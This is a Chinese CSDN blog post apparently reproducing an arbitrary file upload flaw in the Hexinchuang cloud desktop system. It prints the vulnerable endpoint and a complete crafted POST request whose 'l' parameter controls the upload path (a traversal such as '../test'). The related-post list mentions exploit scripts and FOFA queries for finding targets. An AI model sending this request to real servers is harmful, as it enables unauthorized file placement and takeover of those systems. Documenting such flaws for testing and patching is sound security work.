和信创天云桌面任意文件上传

最新推荐文章于 2023-06-27 19:12:33 发布
置顶 最新推荐文章于 2023-06-27 19:12:33 发布
阅读量349 收藏
点赞数
文章标签: 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/115613863
版权

这里写自定义目录标题

和信创天云桌面文件上传getshell

在这里插入图片描述
漏洞地址

http://xx.xx.xx.xx/Upload/upload_file.php

在这里插入图片描述
存在漏洞

构造post包

POST https://x.x.x.x/Upload/upload_file.php?l=../test HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 732

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/avif

1
------WebKitFormBoundaryfcKRltGv--

在这里插入图片描述

l参数可以构造上传目录
qin9.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信创云桌面系统VENGD文件上传漏洞复现
afei001
04-25 453
目录 1.漏洞概述 2.漏洞分析 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 5.2 VESystem_VENGD_fileUpload_POC.py 5.3 VESystem_VENGD_fileUpload_EXP.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 和信创下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合...
信创云桌面系统_命令执行_任意文件上传
MD@@nr丫卡uer
04-12 884
fofa title=“和信下一代云桌面VENGD” 漏洞复现 POST /Upload/upload_file.php?l=test HTTP/1.1 Host: X.X.X.X Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="1
【漏洞复现】和信创云桌面系统任意文件上传
Kris__zhang的博客
05-13 1685
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。 漏洞 和信创云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限 FOFA语句 title="和信下一代云桌面VENGD" 复现 payload: POST /Upl
信创云桌面系统远程命令执行
自强不息
05-31 236
下不定,吾往;​若世道不平,不回!
CaijiOrz#2021_Hvv#和信创云桌面文件上传1
07-25
描述存在某接口可被攻击者利用上传文件利用上传访问。
fengjixuchui#Vulnerability-1#和信创云桌面系统命令执行,文件上传 全版本 RCE1
07-25
信创云桌面系统命令执行,文件上传 全版本 RCE参考:。
fa1c0n1#2021hvv_vul#和信创云桌面命令执行1
07-25
信创云桌面命令执行。
和信F4EFS 文件
10-31
【和信F4EFS 文件】相关知识点详解 在IT领域,"和信F4EFS 文件"提及的是一种特定格式的数据文件,主要用于存储和管理和信(HE)公司的F4设备上的数据。EFS(Encryption File System)是许多操作系统中用于保护数据...
交换机接口电路和信令设备培训教材.ppt
11-12
《交换机接口电路和信令设备培训教材》是关于通信技术中交换机接口与信令设备的详尽讲解,旨在帮助读者深入理解这些关键组成部分。本章主要涵盖了四个部分:交换机接口的基本概念、模拟用户线接口电路、数字用户接口...
漏洞复现|和信创云桌面系统存在任意文件上传&目录遍历漏洞
失心少年
06-27 345
信创专注虚拟化云计算领域,为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势,对于用户应用场景有着普遍的适用性,前后端混合计算保证在调度服务器后端资源的同时,也能充分利用前端计算资源,高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件,能够轻松实现千点以上大规模终端的集中管理。
云轴科技 ZStack 与和信创完成兼容性认证,打造稳定安全的桌面云!
zstack_org的博客
07-19 1274
ZStack Cloud云平台与和信创下一代云桌面系统完成产品兼容互认证!
信创下一代云桌面的三个“万万没想到”
04-25 1726
知名女演员李冰冰在第一次荣膺华表奖优秀女主角奖时,发表了一段感人至深的致辞:“刚才我从台下走到台上用了不到一分钟,但实际上我走了十年,终于拿到了这个奖项。”十年磨一剑,不...
upload_file.php,文件上传 upload_file
weixin_30783205的博客
03-22 514
钩子名称upload_file定义方法\Phpcmf\Hooks::trigger('upload_file',['type'=>$type,'data'=>$data,'file_path'=>$file_path,'attachment'=>$attachment]);参数说明Array('type'=>$type,//存储类型,cont...
信创云桌面系统远程命令执行 RCE漏洞复现渗透测试
kelenwait的博客
07-15 934
前言 和信创云桌面系统,官方介绍,市场上主要有华为、深信服、锐捷、和信创四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三家厂商的云桌面产品多以传统VDI架构为主,和信创的下一代云桌面能够融合VDI、VOI和IDV三大架构。 漏洞影响:和信创云桌面系统 漏洞复现 poc POST /Upload/upload_file.php?l=1 HTTP/1.1 Host: 127.0.0.1:2001 User-Agent: Mozi
2018最值得期待:虚拟化云桌面领导品牌和信创
02-28 2631
是正月十三,祝大家万事大吉!今年春节不一样,中国云报携手虚拟化云桌面领导品牌和信创给您拜年!以下是和信创董事长何钦淋的新春寄语值此新春和元宵佳节到来之际,我谨代表和信创全体同仁向中国云报的粉丝朋友致以新年的问候,祝大家2018年万事大吉,人旺、财旺、事业旺!和信创成立于2009年,公司致力于为用户提供国际领先的虚拟化和云计算解决方案;拥有下一代云桌面、云存储、应用虚拟化、云计算管理平台
2021HW | 04/09 第一总结
hackzkaq的博客
04-09 2501
HW情报
GEE数据集-高分辨率全球树冠高度地图(1 米)Meta 公司.pdf
07-17
绘制植被结构图对于了解全球碳循环以及监测基于自然的气候适应和减缓方法至关重要。通过对这些数据的重复测量,可以观察现有森林的砍伐或退化情况、森林的自然再生以及农林业等可持续农业实践的实施情况。高空间分辨率的树冠高度和树冠投影面积评估对于监测碳通量和评估基于树木的土地利用也很重要,因为森林结构在空间上可能高度异质,特别是在农林系统中。极高分辨率的卫星图像(地面采样距离小于一米)使提取树木层面的信息成为可能,同时还能进行大尺度监测。本文介绍了第一份同时为多个次国家辖区制作的高分辨率树冠高度图。具体来说,我们为加利福尼亚州和圣保罗州制作了非常高分辨率的树冠高度地图,与之前基于哨兵/GEDI 的全球树冠高度地图的十米(10 米)分辨率相比,分辨率有了显著提高。这些地图是通过在 2017 年至 2020 年的 Maxar 图像上训练的自监督模型中提取特征,并根据航空激光雷达地图训练密集预测解码器生成的。我们还引入了一个后处理步骤,使用在 GEDI 观测数据上训练的卷积网络。我们利用预留验证激光雷达数据以及与其他遥感地图和实地收集的数据进行比较,对所提出的地图进行了评估,发现我们的模型产生的平均绝对
Matlab下载安装、仿真实验方法.docx
最新发布
07-17
通过以上步骤,你可以完成Matlab的安装、仿真实验的进行以及撰写详细的实验报告。这些步骤将帮助你建立一个清晰、系统的仿真实验流程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值